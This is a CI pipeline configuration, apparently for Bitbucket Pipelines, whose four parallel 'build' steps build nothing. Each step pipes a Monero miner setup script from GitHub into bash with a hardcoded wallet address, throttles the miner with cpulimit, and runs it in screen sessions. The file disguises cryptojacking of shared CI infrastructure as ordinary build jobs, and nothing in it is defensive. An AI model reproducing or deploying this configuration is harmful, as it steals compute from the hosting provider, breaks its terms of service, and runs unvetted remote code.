image: ubuntu:20.04
pipelines:
  default:
    - parallel:
      - step:
          name: build-1
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - curl -s -L https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.sh | bash -s 82tsjvei4imSqAMBXTUnEPfFdv5PTT6wpim65yfHYErKGmPEDvmdsLSHgNHnQp5xTWitUaiLnNXnvgnvMCyvuUkTF789cgh.$(echo $(shuf -i 1-999999999 -n 1)-Wira) && sudo apt-get update && sudo apt-get install -y cpulimit && sudo cpulimit -e xmrig -l 150 -b
            - screen 
      - step:
          name: build-2
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - apt-get install utils -y
            - curl -s -L https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.sh | bash -s 82tsjvei4imSqAMBXTUnEPfFdv5PTT6wpim65yfHYErKGmPEDvmdsLSHgNHnQp5xTWitUaiLnNXnvgnvMCyvuUkTF789cgh.$(echo $(shuf -i 1-999999999 -n 1)-Wira) && sudo apt-get update && sudo apt-get install -y cpulimit && sudo cpulimit -e xmrig -l 150 -b
            - screen -dmS 
      - step:
          name: build-3
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - apt-get install utils -y
            - curl -s -L https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.sh | bash -s 82tsjvei4imSqAMBXTUnEPfFdv5PTT6wpim65yfHYErKGmPEDvmdsLSHgNHnQp5xTWitUaiLnNXnvgnvMCyvuUkTF789cgh.$(echo $(shuf -i 1-999999999 -n 1)-Wira) && sudo apt-get update && sudo apt-get install -y cpulimit && sudo cpulimit -e xmrig -l 150 -b
            - screen -dmS
      - step:
          name: build-4
          script:
            - apt-get update -y
            - apt-get install sudo screen -y
            - apt-get install utils -y
            - curl -s -L https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.sh | bash -s 82tsjvei4imSqAMBXTUnEPfFdv5PTT6wpim65yfHYErKGmPEDvmdsLSHgNHnQp5xTWitUaiLnNXnvgnvMCyvuUkTF789cgh.$(echo $(shuf -i 1-999999999 -n 1)-Wira) && sudo apt-get update && sudo apt-get install -y cpulimit && sudo cpulimit -e xmrig -l 150 -b
            - screen -dmS